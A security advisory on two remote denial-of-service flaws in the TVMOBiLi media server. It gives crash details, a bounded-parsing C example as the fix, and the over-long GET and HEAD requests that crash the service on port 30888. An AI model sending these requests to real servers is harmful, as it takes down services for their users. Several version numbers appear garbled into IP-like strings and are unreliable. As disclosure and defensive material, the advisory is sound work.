TVMOBiLi Media Server Multiple Remote DoS Vulnerabilities
| Field | Value |
|---|---|
| Product | TVMOBiLi media server |
| Vulnerable Versions | 184.108.40.20657 and probably prior versions |
| Tested Version | 220.127.116.1157 on Windows XP SP3 32-bit |
| Advisory Publication | October 15, 2012 [without technical details] |
| Vendor Notification | October 15, 2012 |
| Vendor Fix | November 21, 2012 |
| Public Disclosure | December 5, 2012 |
| Latest Update | November 27, 2012 |
| Vulnerability Type | Improper Handling of Length Parameter Inconsistency [CWE-130] |
| CVSSv2 Base Score | 5 (AV:N/AC:L/Au:N/C:N/I:N/A:P) |
| Solution Status | Fixed by Vendor |
| Discovered and Provided | High-Tech Bridge Security Research Lab |
High-Tech Bridge Security Research Lab has discovered 2 remote DoS vulnerabilities in TVMOBiLi Media Server, which could be exploited to crash the remote server with malicious HTTP requests.
1) Improper Handling of Length Parameter Inconsistency in TVMOBiLi: CVE-2012-5451
1.1 The vulnerability exists due to improper handling of URI length within the "HttpUtils.dll" dynamic-link library. A remote attacker can send a specially crafted HTTP GET request 161, 257 or 255 characters long to TCP port 30888 (TVMOBiLi's default server port) and cause a stack-based buffer overrun that crashes the tvMobiliService service.
Crash details: MSVCR100.dll:78abe2ad mov [edx], al from thread 1860 caused access violation when attempting to write to 0x0170e000

Request that triggers the crash:
GET /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1

Crash details (CONTEXT DUMP) for the HEAD variant:
HEAD /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1
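The defect class named above (CWE-130) is a request-target copied into a fixed-size stack buffer without first comparing its length with the buffer size. The following is an added example, not code from TVMOBiLi, HttpUtils.dll or High-Tech Bridge, showing the bounded parse that prevents it: the length of the URI is checked against the destination before any byte is copied, and an over-long or malformed request line is rejected with an error code instead of overrunning the stack. `URI_MAX`, `parse_request_uri`, `accepted_uri_length` and `probe_synthetic_request` are names and values chosen for this example; nothing is known from the advisory about the real buffer size or function layout in the DLL.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed value for this example: size of the stack buffer that receives
 * the URI, terminator included. The real HttpUtils.dll layout is not known. */
#define URI_MAX 256

enum parse_result {
    PARSE_OK           =  0,
    PARSE_BAD_FORMAT   = -1,   /* not "METHOD SP target SP version" */
    PARSE_URI_TOO_LONG = -2    /* target would not fit in the destination */
};

/* Copy the request-target of "METHOD SP target SP HTTP/x.y" into out.
 * The target length is compared with outsz BEFORE any byte is copied;
 * omitting that comparison is the CWE-130 defect the advisory describes. */
int parse_request_uri(const char *line, char *out, size_t outsz)
{
    const char *sp1 = strchr(line, ' ');
    if (sp1 == NULL || sp1 == line)
        return PARSE_BAD_FORMAT;
    const char *target = sp1 + 1;
    const char *sp2 = strchr(target, ' ');
    if (sp2 == NULL || sp2 == target)
        return PARSE_BAD_FORMAT;
    size_t len = (size_t)(sp2 - target);
    if (len >= outsz)                 /* one byte must remain for the NUL */
        return PARSE_URI_TOO_LONG;
    memcpy(out, target, len);
    out[len] = '\0';
    return PARSE_OK;
}

/* Handle one request line with a URI_MAX stack buffer, the way a server's
 * request handler would. Returns the accepted URI length, or the negative
 * parse_result when the line is rejected. */
int accepted_uri_length(const char *line)
{
    char uri[URI_MAX];
    int rc = parse_request_uri(line, uri, sizeof uri);
    return rc == PARSE_OK ? (int)strlen(uri) : rc;
}

/* Build "<method> /AAA...A HTTP/1.1" with n 'A' bytes after the slash and
 * feed it to accepted_uri_length. Constructed input used only to probe the
 * size boundary of the handler. */
int probe_synthetic_request(const char *method, size_t n)
{
    const char *tail = " HTTP/1.1";
    size_t total = strlen(method) + 2 + n + strlen(tail) + 1;
    char *line = malloc(total);
    if (line == NULL)
        return PARSE_BAD_FORMAT;
    int w = snprintf(line, total, "%s /", method);
    memset(line + w, 'A', n);
    memcpy(line + w + n, tail, strlen(tail) + 1);
    int rc = accepted_uri_length(line);
    free(line);
    return rc;
}

int main(void)
{
    printf("GET /index.html      -> %d\n", accepted_uri_length("GET /index.html HTTP/1.1"));
    printf("GET  254 x 'A'       -> %d\n", probe_synthetic_request("GET", 254));
    printf("HEAD 255 x 'A'       -> %d\n", probe_synthetic_request("HEAD", 255));
    printf("GET  2000 x 'A'      -> %d\n", probe_synthetic_request("GET", 2000));
    return 0;
}
```

With a 256-byte buffer, a target of 255 bytes (slash plus 254 'A's) is the longest accepted; one more byte is rejected with `PARSE_URI_TOO_LONG` rather than written past the buffer. The same rejection path is where a server would log the over-long request, which is also the simplest detection signal for this advisory: request lines to the media server port whose target exceeds the size the service can legitimately handle.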
Solution: Upgrade to TVMOBiLi 18.104.22.16874
References:
- High-Tech Bridge Advisory HTB23120 - https://www.htbridge.com/advisory/HTB23120 - TvMobili Media Server Multiple Remote DoS Vulnerabilities.
- TVMOBiLi LTD - http://www.tvmobili.com - TVMOBiLi is a free media server for Mac, Windows, and Linux operating systems.
- Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
- Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
Please feel free to send us any additional information related to this advisory, such as vulnerable versions, additional exploitation details and conditions, patches and other relevant details.